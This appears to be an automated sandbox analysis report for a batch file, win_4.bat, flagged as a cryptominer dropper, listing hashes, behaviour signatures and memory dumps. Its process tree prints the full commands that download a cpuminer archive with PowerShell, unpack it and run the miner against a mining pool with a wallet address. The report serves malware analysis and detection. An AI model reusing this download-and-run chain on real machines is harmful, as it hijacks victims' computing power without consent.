c2fe05164b92d20e8976f4994bdea7a7e9bd4cb9f85d9dcecef9c5876a5bfd70

Analysis

max time kernel
1800s
max time network
1780s
platform
windows10-1703_x64
resource
win10-20230621-en
resource tags

arch:x64arch:x86image:win10-20230621-enlocale:en-usos:windows10-1703-x64system
submitted
30-06-2023 14:47

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

win_4.bat
Size

706B
MD5

ddc05c409f627a4382bff4c3a49423df
SHA1

0f77ae481593bc1b0669dae7a044d0b96f39413f
SHA256

6daf93d284bd5d39f613d6d3f96c083d1b99baa10e7acbf65f74ab84fe551887
SHA512

0bdfacc137a0f40cfffa34d3549961fe20dc35905e14a9b5c207cab380594dff09dfe641a534fb0d3211bcce3b727801df8c7c635fbc9c0cd26d6e7914818cc3

Score

10^/10

upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip

Signatures

Blocklisted process makes network request 2 IoCs

flow	pid	Process
2	2712	powershell.exe
4	2712	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
4356	cpuminer-sse2.exe

UPX packed file 53 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral7/files/0x000600000001af18-281.dat	upx
behavioral7/files/0x000600000001af18-282.dat	upx
behavioral7/memory/4356-283-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-284-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-285-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-286-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-287-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-288-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-289-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-290-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-291-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-293-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-295-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-296-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-297-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-299-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-300-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-302-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-303-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-304-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-305-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-306-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-307-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-308-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-309-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-310-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-311-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-314-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-315-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-317-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-318-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-319-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-320-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-321-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-322-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-323-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-325-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-326-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-327-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-328-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-333-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-334-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-336-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-337-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-338-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-340-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-341-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-342-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-343-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-344-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-345-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-347-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx
behavioral7/memory/4356-348-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp	upx

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
2712	powershell.exe
2712	powershell.exe
2712	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2712	powershell.exe
Token: SeDebugPrivilege	3764	powershell.exe
Token: SeLockMemoryPrivilege	4356	cpuminer-sse2.exe
Token: SeLockMemoryPrivilege	4356	cpuminer-sse2.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 2432 wrote to memory of 2712	2432	cmd.exe	67
PID 2432 wrote to memory of 2712	2432	cmd.exe	67
PID 2432 wrote to memory of 3764	2432	cmd.exe	68
PID 2432 wrote to memory of 3764	2432	cmd.exe	68
PID 2432 wrote to memory of 4356	2432	cmd.exe	69
PID 2432 wrote to memory of 4356	2432	cmd.exe	69

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\win_4.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2432
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip', 'cpuminer-opt-win.zip')"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2712
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Expand-Archive -Force -Path cpuminer-opt-win.zip -DestinationPath cpuminer-opt"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3764
- C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe
  .\cpuminer-sse2.exe -a cpupower -o stratum+tcp://cpupower.eu.mine.zpool.ca:6240 -u oHyVvSQ3HDCgrM7MSJNzWmisqohcssm15C -p -c=OMEGA
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  PID:4356

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a0115b5cf4c637a21440efc6b8c06bea

SHA1
3a1754656f208f02db18942e48d2c47185c4f110

SHA256
675b28bb342f549a8882e00e6a0df6d8374f3bd45a1e930161f30e240d258b3b

SHA512
1a74560cda19f8665fa9af3cce6f55cff4c09cd6e0245f52fea3e5b60fdd068b4878ade1ec44a432455bf59cdfcf85ca12cf5a5e55efbe730f1c0bf77f5f5e35

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ztok3grg.0x2.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-opt-win.zip

Filesize
20.9MB

MD5
99cc95c9ce13cf3da743e1d56dabe92d

SHA1
e819db3b6ad4703fbc8535dadad3ad29d3cc2039

SHA256
df84febc2319e8e5cca7e6d0c9341d4a6824fb28646c1e435b7da58e9f9ec59b

SHA512
932523c4ab20c83343395498be61497dbc9ad90b3b35d3551817b94dd530b083b07d3a4b37b04c4f3d97ed1e8bb036d9d18b079a86ce46816b3a31d9eba35c02

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe

Filesize
2.6MB

MD5
d136eb0fdd0e7826893f332c7fc3f7a2

SHA1
1e7fd635278e954eb0ee8cb951d16e4ecf60592f

SHA256
993929dd32eaa7aeba81ed940fc65a9a545a8e1380be516d8086ad0376448a26

SHA512
895e72ad7dc045bdcff8a5e4e070fcb56a1361d99272d0f968cf9e83b7a568fe93c132c9d3e810292c08e8d7d4f8592ca7ed253be00bd3381a3f939a87b83757

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe

Filesize
2.6MB

MD5
d136eb0fdd0e7826893f332c7fc3f7a2

SHA1
1e7fd635278e954eb0ee8cb951d16e4ecf60592f

SHA256
993929dd32eaa7aeba81ed940fc65a9a545a8e1380be516d8086ad0376448a26

SHA512
895e72ad7dc045bdcff8a5e4e070fcb56a1361d99272d0f968cf9e83b7a568fe93c132c9d3e810292c08e8d7d4f8592ca7ed253be00bd3381a3f939a87b83757

Download Submit
memory/2712-142-0x000001D9FD4E0000-0x000001D9FD4F0000-memory.dmp

Filesize
64KB

Download
memory/2712-141-0x000001D9FD4E0000-0x000001D9FD4F0000-memory.dmp

Filesize
64KB

Download
memory/2712-128-0x000001D9FF4C0000-0x000001D9FF536000-memory.dmp

Filesize
472KB

Download
memory/2712-146-0x000001D9FD4E0000-0x000001D9FD4F0000-memory.dmp

Filesize
64KB

Download
memory/2712-125-0x000001D9FF210000-0x000001D9FF232000-memory.dmp

Filesize
136KB

Download
memory/3764-178-0x0000020CF6420000-0x0000020CF6430000-memory.dmp

Filesize
64KB

Download
memory/3764-179-0x0000020CF6420000-0x0000020CF6430000-memory.dmp

Filesize
64KB

Download
memory/3764-193-0x0000020CF65A0000-0x0000020CF65B2000-memory.dmp

Filesize
72KB

Download
memory/3764-206-0x0000020CF6580000-0x0000020CF658A000-memory.dmp

Filesize
40KB

Download
memory/3764-208-0x0000020CF6420000-0x0000020CF6430000-memory.dmp

Filesize
64KB

Download
memory/4356-303-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-314-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-285-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-286-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-287-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-288-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-289-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-290-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-291-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-293-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-295-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-296-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-297-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-299-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-300-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-302-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-283-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-304-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-305-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-306-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-307-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-308-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-309-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-310-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-311-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-284-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-315-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-317-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-318-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-319-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-320-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-321-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-322-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-323-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-325-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-326-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-327-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-328-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-333-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-334-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-336-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-337-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-338-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-340-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-341-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-342-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-343-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-344-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-345-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-347-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download
memory/4356-348-0x00007FF6F0540000-0x00007FF6F0BBD000-memory.dmp

Filesize
6.5MB

Download